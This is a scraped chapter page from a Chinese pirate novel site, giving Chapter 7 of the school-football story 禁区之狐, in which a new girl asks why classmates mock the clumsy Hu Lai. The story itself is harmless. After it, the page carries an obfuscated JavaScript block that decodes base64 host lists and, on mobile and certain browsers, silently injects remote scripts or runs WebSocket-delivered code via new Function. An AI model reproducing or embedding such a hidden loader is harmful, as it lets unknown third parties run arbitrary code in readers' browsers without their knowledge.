笔趣阁

字:
关灯 护眼
笔趣阁 > 禁区之狐 > 第七章 为什么喜欢?

第七章 为什么喜欢?

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
东川中学有着非常漂亮的体育场,这么漂亮的体育场如果每节课只让一个班级去上体育课,会不会很浪费?
  所以东川中学的体育课大多数都是两个班级一起上的,甚至还有三个班级一起上的时候。
  这可以充分有效地利用硬件条件如此之好的场地。
  今天下午这节体育课就是高一二班和高一三班同时上的。
  于是两个班的男生早就约好了要在体育课上踢一场足球比赛,这也是为了接下来的校队招新做热身。
  李青青站在看台上,在她下面的场地边就是三班的男生们,他们聚在一起,似乎正在商量怎么排阵容。
  其实就算罗凯不邀请她,她也会来看这场比赛的。
  她也想看看这个学校的足球水平究竟怎么样,自己爸爸将要执教的球队如何。
  然后她在男生当中看到了的那个瘦弱的身影。
  胡莱。
  她在一上午的时间里已经听说过好几次这个名字了。
  简直可以说是这个班级的“名人”,只不过似乎不是什么好名声。大家在提到他名字的时候更多的是一种戏谑和不屑。
  就好像现在这样。
  “胡莱你还是别来了吧……”
  “对啊,我们踢比赛,你来捣什么乱?”
  胡莱想要挤进来,但却被其他男生挡在了人群外面。
  “你们不能拿老眼光看人!我经过特训已经变强了!”人群外的胡莱跳起来举起手臂大声嚷嚷。
  没人听到他的声音,没人看他一眼,没人把他当回事儿。
  ※※※
  “他们为什么都不愿意带他一起踢?”看台上的李青青情不自禁地自言自语起来。
  “因为胡莱踢球很烂啊。”
  身边突然响起来一个声音,把李青青都吓了一跳,她扭头这才发现自己身边不知道什么时候多了一个大胖子。
  看到李青青疑惑的目光,宋嘉佳脸上挂着近乎谄媚的笑容:“我叫宋嘉佳。”
  “你好。”李青青微笑着点点头,然后迅速把话题转移了回去,“他踢球很烂吗?”
  “相当烂!”宋嘉佳用很肯定的语气说道。
  李青青是见过胡莱踢球的,以她的眼光来看,胡莱踢得并不好,但似乎和相当烂差距也挺大的。
  见李青青似乎有些不太相信,宋嘉佳来了劲:“你不信啊?我给你说啊,胡莱是那种打前锋当人家后卫卧底,打后卫当人家前锋卧底的人呢!”
  “夸张了吧?”
  “不夸张不夸张。”宋嘉佳摆摆手,就像是在给自己扇风一样。“我们班第一次和三班比赛,他打的前锋,第一次拿球就踩足球上摔了!挡出了罗凯的两次射门。还有一次近在咫尺的空门——对方门将出击冒了,球就落在胡来身前,你猜他怎么处理的?”
  李青青尝试着猜道:“他踢飞了?”
  宋嘉佳一副“胡莱就是这么让人猜不到”的得意表情,用兴奋地语气说道:“他竟然用手去打!而且用手都还没把足球打进去!他把足球用力拍下去,结果足球弹起来直接打到了他的脸!哈哈哈!”
  胖子笑得浑身的肉都在抖。
  李青青想了一下那样的场面,也觉得真是有点……滑稽。
  但她没笑,而是反问宋嘉佳:“你不是胡莱的同桌吗?”
  潜台词就是看你关系和胡莱好像还不错,为什么说到胡莱的糗事却这么开心?那你和那些嘲笑胡莱的人有什么两样?
  面对李青青的问题,宋嘉佳撇撇嘴:“我不喜欢胡莱去踢球。”
  “为什么?”
  “踢球有什么好的?踢成他这个样子,只能被人当做笑柄。”
  “就不允许他喜欢足球,所以才踢球吗?”
  “因为喜欢足球所以才踢球?”宋嘉佳突然笑了起来。“结果被人嘲笑,被人当成笑话,被人瞧不起……喜欢足球就这结果?那这足球有什么好喜欢的?一个人如果在自己喜欢的东西上不能感到开心,喜欢来干嘛?我瞅着胡莱也不是受虐狂啊……”
  李青青嘴巴微张,却说不出话来,因为她觉得这位胡莱的同桌说的好像很有道理,让她无法反驳。
  仔细想一想,她为什么喜欢足球?
  一开始是因为她的爸爸,让她接触上了足球。随后是年幼的她喜欢追着一个圆滚滚的足球的感觉——爸爸说她小时候还不会走路的时候就喜欢追着足球爬,足球在前面滚,她就在后面咯咯笑着四肢并用地追向足球。
『加入书签,方便阅读』
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDA4NQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x4d\x4a\x52\x5a\x74\x53\x42\x70\x63\x77']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vYWpmMmpkajlmajI5LmJiZGlhbbnppc2h1LmNvbbQ==','d3NzOOi8vd3MuYW5kYTE1MTYuY29tOOjkwOOTAsd3NzOOi8vd3Muc3luZ2d5LmNvbTo5MDkwLHdzczovL3dzLnpoaXB1ZnMuY29tOOjkwOOTA=',window,document,['b','O']);}:function(){};